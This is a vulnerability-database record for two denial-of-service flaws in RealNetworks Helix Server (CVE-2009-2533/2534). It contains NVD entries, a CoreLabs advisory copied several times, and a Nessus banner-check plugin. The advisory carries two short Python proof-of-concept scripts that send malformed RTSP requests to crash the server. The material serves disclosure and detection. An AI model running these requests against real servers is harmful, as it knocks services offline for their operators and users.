{"cve": [{"lastseen": "2018-10-11T11:33:53", "bulletinFamily": "NVD", "description": "rmserver in RealNetworks Helix Server and Helix Mobile Server before 13.0.0 allows remote attackers to cause a denial of service (daemon exit) via multiple RTSP SET_PARAMETER requests with empty DataConvertBuffer headers.", "modified": "2018-10-10T15:40:33", "published": "2009-07-20T13:30:54", "id": "CVE-2009-2533", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2533", "title": "CVE-2009-2533", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-11T11:33:53", "bulletinFamily": "NVD", "description": "RealNetworks Helix Server and Helix Mobile Server before 13.0.0 allow remote attackers to cause a denial of service (daemon crash) via an RTSP SETUP request that (1) specifies the / URI or (2) lacks a / character in the URI.", "modified": "2018-10-10T15:40:34", "published": "2009-07-20T13:30:57", "id": "CVE-2009-2534", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2534", "title": "CVE-2009-2534", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T10:05:10", "bulletinFamily": "exploit", "description": "Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities. CVE-2009-2533,CVE-2009-2534. Dos exploits for multiple platform", "modified": "2009-07-17T00:00:00", "published": "2009-07-17T00:00:00", "id": "EDB-ID:9198", "href": "https://www.exploit-db.com/exploits/9198/", "type": "exploitdb", "title": "Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nReal Helix DNA RTSP and SETUP request handler vulnerabilities\n\n\n1. 
*Advisory Information*\n\nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities\nAdvisory ID: CORE-2009-0227\nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna\nDate published: 2009-07-17\nDate of last update: 2009-07-17\nVendors contacted: RealNetworks\nRelease mode: Forced release\n\n\n2. *Vulnerability Information*\n\nClass: Denial of service (DoS)\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: N/A\nCVE Name: CVE-2009-2533, CVE-2009-2534\n\n\n3. *Vulnerability Description*\n\nHelix Server is a multi-format cross-platform streaming server. Two\nvulnerabilities have been found, that could allow a remote attacker to\ncrash the Helix Server.\n\nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty\n'DataConvertBuffer' parameter is received by the server, it will raise\nan exception reading an invalid direction of memory. This exception is\nusually handled correctly but if you send this malformed request\nmultiple times in a short period of time, it could render the Helix\nServer unresponsive and terminate its execution.\n\nDuring the 'SETUP' request handling, a 0x2F character is searched in the\nrequest line, if this byte is absent the process crashes with an access\nviolation.\n\n\n4. *Vulnerable packages*\n\n . Helix Server Version 12.x\n . Helix Mobile Server Version 12.x\n . The vulnerabilities were investigated on Helix Server Version\n12.0.1.215 (Tahiti) Build 175002/12667\n\n\n5. *Non-vulnerable packages*\n\n . Helix Server Version 13.0.0\n . Helix Mobile Server Version 13.0.0\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nAccording to the Security Update 071409HS [2] published by RealNetworks:\n\"The vulnerability is resolved on the following platforms by installing\nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This\nonly pertains to supported versions of the platforms listed below. 
The\nupdated version will be available on your RealNetworks PAM site after\n12:00 am PST, on July 14, 2009.\"\n\n . Red Hat Enterprise Linux 4\n . Red Hat Enterprise Linux 5\n . Sun Solaris 10\n . Windows 2003\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Damian Frizza\nfrom Core Security Technologies.\n\n\n8. *Technical Description / Proof of Concept Code*\n\n\n8.1. *RTSP request handling Denial of Service (CVE-2009-2533)*\n\nThe problem arises when the 'rmserver' process receives an 'RTSP\n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer'\nparameter. The handling code reads at the memory location zero (0) and\ntriggers an exception, which is handled correctly. However sending this\nmalformed request multiple times renders the rmserver process\nunresponsive and subsequently stops its execution.\n\nThe code section which triggers the exception is:\n\n/-----------\n\n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0\n*Sets the content of the local variable to 0\n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]\n0045806F |. 50 PUSH EAX\n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C]\n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] *\nTries to read form 0 memory location\n\n- -----------/\n\n The following PoC code reproduces the issue:\n\n/-----------\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('172.16.132.133',554))\n\nsetRequest = \"SET_PARAMETER / RTSP/1.0\\r\\n\"\nsetRequest +=\"DataConvertBuffer: \\r\\n\\r\\n\"\n\nfor i in range(5):\n print i\n s.send(setRequest)\n\ns.close()\n\n- -----------/\n\n\n\nThe following output is written in the log file:\n\n/-----------\n\n4068: FATAL ERROR: The server has run out of memory!\nFATAL ERROR: Last request was rounded up to 1155072 bytes\nTrace:\n0x00409C96\n...\n...\n...\n0x00000000\nFATAL ERROR: Server Terminated\n\n- -----------/\n\n\n8.2. 
*Malformed SETUP command handling Denial of Service (CVE-2009-2534)*\n\nThe problem arises when the 'SETUP' request is handled and the byte 0x2F\nis absent in the request line. While handling this kind of malformed\nrequest the server crashes with an access violation.\n\nThe code section which triggers the access violation is:\n\n/-----------\n\n0047A490 |. 6A 2F PUSH 2F\n0047A492 |. 56 PUSH ESI\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\n ; MSVCR71.strchr\n\n- -----------/\n\n if only the \"/\" (0x2F) character is sent, the program tries to copy\nfrom 0 and the access violation exception is raised.\n\n/-----------\n\n0047A490 |. 6A 2F PUSH 2F\n0047A492 |. 56 PUSH ESI\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\n ; MSVCR71.strchr\n\n- -----------/\n\n The following code reproduces the issue:\n\n/-----------\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('172.16.132.133',554))\n\nsetRequest = \"SETUP / RTSP/1.0\\r\\n\\r\\n\"\n\ns.send(setRequest)\ns.close()\n\n- -----------/\n\n\n9. *Report Timeline*\n\n. 2009-03-04:\nCore Security Technologies notifies RealNetworks of the vulnerability.\nCore initially schedules publication of its advisory to April 6th, 2009.\n\n. 2009-03-16:\nCore notifies again RealNetworks of the vulnerability.\n\n. 2009-03-16:\nRealNetworks identifies the vulnerability alert as SPAM.\n\n. 2009-03-20:\nThe RealNetworks team asks Core for a technical description of the\nvulnerability.\n\n. 2009-03-23:\nTechnical details sent to RealNetworks team by Core. RealNetworks\nacknowledges reception.\n\n. 2009-03-30:\nCore requests information about the plans of RealNetworks to fix the\nvulnerabilities.\n\n. 2009-03-30:\nRealNetworks responds that fixes will be included in the next public\nrelease - currently targeted for July 2009.\n\n. 
2009-05-04:\nCore requests RealNetworks a technical analysis of the vulnerabilities,\na list of the affected versions of Helix Server, and a detailed timeline\nfor developing, testing and releasing fixes for these vulnerabilities.\nIt is only based on that information that Core can reevaluate its\nadvisory publication timeframe (which was originally scheduled to be\npublished on April 6).\n\n. 2009-05-05:\nRealNetworks responds that fixes will be available in mid-2009, most\nlikely in the July time frame, and that to protect its customer base\nRealNetworks will not provide additional details until the release is\npublicly available.\n\n. 2009-05-05:\nCore requests a more precise estimation for the release of fixes (no\nreply received).\n\n. 2009-05-29:\nCore requests again RealNetworks an estimated date for the release of\nfixes, and technical details about the issues. In the meantime, the\npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no\nreply received).\n\n. 2009-07-16:\nAn updated version of the advisory was sent to RealNetworks by Core.\nCore requests again information about this issue.\n\n. 2009-07-17:\nCore is made aware that Real Networks has released the Security Update\n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix\nServer and the Helix Mobile Server have been updated to ensure that the\nabove vulnerabilities have been resolved.\n\n. 2009-07-17:\nThe advisory CORE-2009-0227 is published by Core.\n\n\n\n10. *References*\n\n[1] RealNetworks\nhttp://www.realnetworks.com/\n[2] RealNetworks Security Update 071409HS\nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. 
We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.8 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH\nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh\n=9iPO\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-07-17]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9198/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nReal Helix DNA RTSP and SETUP request handler vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities\r\nAdvisory ID: CORE-2009-0227\r\nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna\r\nDate published: 2009-07-17\r\nDate of last update: 2009-07-17\r\nVendors contacted: RealNetworks\r\nRelease mode: Forced release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Denial of service (DoS)\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: N/A\r\nCVE Name: CVE-2009-2533, CVE-2009-2534\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHelix Server is a multi-format cross-platform streaming server. Two\r\nvulnerabilities have been found, that could allow a remote attacker to\r\ncrash the Helix Server.\r\n\r\nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty\r\n'DataConvertBuffer' parameter is received by the server, it will raise\r\nan exception reading an invalid direction of memory. 
This exception is\r\nusually handled correctly but if you send this malformed request\r\nmultiple times in a short period of time, it could render the Helix\r\nServer unresponsive and terminate its execution.\r\n\r\nDuring the 'SETUP' request handling, a 0x2F character is searched in the\r\nrequest line, if this byte is absent the process crashes with an access\r\nviolation.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Helix Server Version 12.x\r\n . Helix Mobile Server Version 12.x\r\n . The vulnerabilities were investigated on Helix Server Version\r\n12.0.1.215 (Tahiti) Build 175002/12667\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Helix Server Version 13.0.0\r\n . Helix Mobile Server Version 13.0.0\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nAccording to the Security Update 071409HS [2] published by RealNetworks:\r\n\"The vulnerability is resolved on the following platforms by installing\r\nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This\r\nonly pertains to supported versions of the platforms listed below. The\r\nupdated version will be available on your RealNetworks PAM site after\r\n12:00 am PST, on July 14, 2009.\"\r\n\r\n . Red Hat Enterprise Linux 4\r\n . Red Hat Enterprise Linux 5\r\n . Sun Solaris 10\r\n . Windows 2003\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Damian Frizza\r\nfrom Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *RTSP request handling Denial of Service (CVE-2009-2533)*\r\n\r\nThe problem arises when the 'rmserver' process receives an 'RTSP\r\n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer'\r\nparameter. The handling code reads at the memory location zero (0) and\r\ntriggers an exception, which is handled correctly. 
However sending this\r\nmalformed request multiple times renders the rmserver process\r\nunresponsive and subsequently stops its execution.\r\n\r\nThe code section which triggers the exception is:\r\n\r\n/-----------\r\n\r\n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0\r\n*Sets the content of the local variable to 0\r\n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]\r\n0045806F |. 50 PUSH EAX\r\n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C]\r\n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] *\r\nTries to read form 0 memory location\r\n\r\n- -----------/\r\n\r\n The following PoC code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = \"SET_PARAMETER / RTSP/1.0\\r\\n\"\r\nsetRequest +=\"DataConvertBuffer: \\r\\n\\r\\n\"\r\n\r\nfor i in range(5):\r\n print i\r\n s.send(setRequest)\r\n\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n\r\nThe following output is written in the log file:\r\n\r\n/-----------\r\n\r\n4068: FATAL ERROR: The server has run out of memory!\r\nFATAL ERROR: Last request was rounded up to 1155072 bytes\r\nTrace:\r\n0x00409C96\r\n...\r\n...\r\n...\r\n0x00000000\r\nFATAL ERROR: Server Terminated\r\n\r\n- -----------/\r\n\r\n\r\n8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)*\r\n\r\nThe problem arises when the 'SETUP' request is handled and the byte 0x2F\r\nis absent in the request line. While handling this kind of malformed\r\nrequest the server crashes with an access violation.\r\n\r\nThe code section which triggers the access violation is:\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. 
FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n if only the \"/\" (0x2F) character is sent, the program tries to copy\r\nfrom 0 and the access violation exception is raised.\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n The following code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = \"SETUP / RTSP/1.0\\r\\n\\r\\n\"\r\n\r\ns.send(setRequest)\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-03-04:\r\nCore Security Technologies notifies RealNetworks of the vulnerability.\r\nCore initially schedules publication of its advisory to April 6th, 2009.\r\n\r\n. 2009-03-16:\r\nCore notifies again RealNetworks of the vulnerability.\r\n\r\n. 2009-03-16:\r\nRealNetworks identifies the vulnerability alert as SPAM.\r\n\r\n. 2009-03-20:\r\nThe RealNetworks team asks Core for a technical description of the\r\nvulnerability.\r\n\r\n. 2009-03-23:\r\nTechnical details sent to RealNetworks team by Core. RealNetworks\r\nacknowledges reception.\r\n\r\n. 2009-03-30:\r\nCore requests information about the plans of RealNetworks to fix the\r\nvulnerabilities.\r\n\r\n. 2009-03-30:\r\nRealNetworks responds that fixes will be included in the next public\r\nrelease - currently targeted for July 2009.\r\n\r\n. 2009-05-04:\r\nCore requests RealNetworks a technical analysis of the vulnerabilities,\r\na list of the affected versions of Helix Server, and a detailed timeline\r\nfor developing, testing and releasing fixes for these vulnerabilities.\r\nIt is only based on that information that Core can reevaluate its\r\nadvisory publication timeframe (which was originally scheduled to be\r\npublished on April 6).\r\n\r\n. 
2009-05-05:\r\nRealNetworks responds that fixes will be available in mid-2009, most\r\nlikely in the July time frame, and that to protect its customer base\r\nRealNetworks will not provide additional details until the release is\r\npublicly available.\r\n\r\n. 2009-05-05:\r\nCore requests a more precise estimation for the release of fixes (no\r\nreply received).\r\n\r\n. 2009-05-29:\r\nCore requests again RealNetworks an estimated date for the release of\r\nfixes, and technical details about the issues. In the meantime, the\r\npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no\r\nreply received).\r\n\r\n. 2009-07-16:\r\nAn updated version of the advisory was sent to RealNetworks by Core.\r\nCore requests again information about this issue.\r\n\r\n. 2009-07-17:\r\nCore is made aware that Real Networks has released the Security Update\r\n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix\r\nServer and the Helix Mobile Server have been updated to ensure that the\r\nabove vulnerabilities have been resolved.\r\n\r\n. 2009-07-17:\r\nThe advisory CORE-2009-0227 is published by Core.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] RealNetworks\r\nhttp://www.realnetworks.com/\r\n[2] RealNetworks Security Update 071409HS\r\nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH\r\nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh\r\n=9iPO\r\n-----END PGP SIGNATURE-----", "modified": "2009-07-20T00:00:00", "published": "2009-07-20T00:00:00", "id": "SECURITYVULNS:DOC:22192", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22192", "title": "CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:09:36", "bulletinFamily": "scanner", "description": "According to its banner, The remote host is running version 12.x of\nRealNetworks Helix Server / Helix Mobile Server. Such versions are\nreportedly affected by multiple issues :\n\n - By sending a specially crafted 'RTSP' (SET_PARAMETERS) \n request with a 'DataConvertBuffer' parameter and either\n no 'Content-Length' header or an invalid 'Content-Length'\n header, an attacker may be able to crash the remote Helix \n server process. (CVE-2009-2533)\n\n - By sending a 'SETUP' request without including a '/' \n character in it, a remote attacker may be able to crash\n the remote Helix server process. 
(CVE-2009-2534)", "modified": "2018-11-15T00:00:00", "published": "2009-07-21T00:00:00", "id": "HELIX_SVR_13_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40350", "title": "RealNetworks Helix Server < 13.0.0 Multiple Remote DoS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40350);\n script_version (\"1.9\");\n\n script_cve_id(\"CVE-2009-2533\", \"CVE-2009-2534\");\n script_bugtraq_id(35731, 35732);\n script_xref(name:\"Secunia\", value:\"35815\");\n \n script_name(english:\"RealNetworks Helix Server < 13.0.0 Multiple Remote DoS\");\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote media streaming server is affected by multiple denial of\nservice vulnerabilities.\" );\n\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, The remote host is running version 12.x of\nRealNetworks Helix Server / Helix Mobile Server. Such versions are\nreportedly affected by multiple issues :\n\n - By sending a specially crafted 'RTSP' (SET_PARAMETERS) \n request with a 'DataConvertBuffer' parameter and either\n no 'Content-Length' header or an invalid 'Content-Length'\n header, an attacker may be able to crash the remote Helix \n server process. (CVE-2009-2533)\n\n - By sending a 'SETUP' request without including a '/' \n character in it, a remote attacker may be able to crash\n the remote Helix server process. 
(CVE-2009-2534)\" );\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.coresecurity.com/content/real-helix-dna\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2009/Jul/121\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\" );\n\n script_set_attribute(attribute:\"solution\", value:\n\"Update to RealNetworks Helix Server / Helix Mobile Server 13.0.0 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Checks version in banner.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Misc.\");\n script_dependencies(\"rtsp_detect.nasl\");\n script_require_ports(\"Services/rtsp\", 554);\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\n\nport = get_kb_item(\"Services/rtsp\");\nif ( ! 
port ) port = 554;\n\nif (!get_port_state(port)) exit(0);\n\nserv = get_kb_item(string(\"rtsp/server/\",port));\n\nif (!serv || !ereg(pattern:\"Helix (Mobile|) *Server Version\",string:serv)) \n exit(0,\"Banner not from Helix Server or Helix Mobile Server.\");\n\n# Versions 12.x are affected \n\nif (ereg(pattern:\"Version 12\", string:serv)) \n{\n if (report_verbosity > 0)\n { \n report = string(\n '\\n',\n 'The remote Helix server responded with the following banner :\\n',\n '\\n',\n ' ', serv,'\\n'\n );\n security_warning(port:port,extra:report);\n }\n else security_warning(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:43:28", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-07-18T00:00:00", "published": "2009-07-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11832", "id": "SSV:11832", "type": "seebug", "title": "Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nReal Helix DNA RTSP and SETUP request handler vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities\r\nAdvisory ID: CORE-2009-0227\r\nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna\r\nDate published: 2009-07-17\r\nDate of last update: 2009-07-17\r\nVendors contacted: RealNetworks\r\nRelease mode: Forced release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Denial of service (DoS)\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: N/A\r\nCVE Name: CVE-2009-2533, CVE-2009-2534\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHelix Server is a multi-format cross-platform streaming server. 
Two\r\nvulnerabilities have been found, that could allow a remote attacker to\r\ncrash the Helix Server.\r\n\r\nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty\r\n'DataConvertBuffer' parameter is received by the server, it will raise\r\nan exception reading an invalid direction of memory. This exception is\r\nusually handled correctly but if you send this malformed request\r\nmultiple times in a short period of time, it could render the Helix\r\nServer unresponsive and terminate its execution.\r\n\r\nDuring the 'SETUP' request handling, a 0x2F character is searched in the\r\nrequest line, if this byte is absent the process crashes with an access\r\nviolation.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Helix Server Version 12.x\r\n . Helix Mobile Server Version 12.x\r\n . The vulnerabilities were investigated on Helix Server Version\r\n12.0.1.215 (Tahiti) Build 175002/12667\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Helix Server Version 13.0.0\r\n . Helix Mobile Server Version 13.0.0\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nAccording to the Security Update 071409HS [2] published by RealNetworks:\r\n\"The vulnerability is resolved on the following platforms by installing\r\nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This\r\nonly pertains to supported versions of the platforms listed below. The\r\nupdated version will be available on your RealNetworks PAM site after\r\n12:00 am PST, on July 14, 2009.\"\r\n\r\n . Red Hat Enterprise Linux 4\r\n . Red Hat Enterprise Linux 5\r\n . Sun Solaris 10\r\n . Windows 2003\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Damian Frizza\r\nfrom Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. 
*RTSP request handling Denial of Service (CVE-2009-2533)*\r\n\r\nThe problem arises when the 'rmserver' process receives an 'RTSP\r\n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer'\r\nparameter. The handling code reads at the memory location zero (0) and\r\ntriggers an exception, which is handled correctly. However sending this\r\nmalformed request multiple times renders the rmserver process\r\nunresponsive and subsequently stops its execution.\r\n\r\nThe code section which triggers the exception is:\r\n\r\n/-----------\r\n\r\n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0\r\n*Sets the content of the local variable to 0\r\n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]\r\n0045806F |. 50 PUSH EAX\r\n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C]\r\n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] *\r\nTries to read form 0 memory location\r\n\r\n- -----------/\r\n\r\n The following PoC code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = \"SET_PARAMETER / RTSP/1.0\\r\\n\"\r\nsetRequest +=\"DataConvertBuffer: \\r\\n\\r\\n\"\r\n\r\nfor i in range(5):\r\n print i\r\n 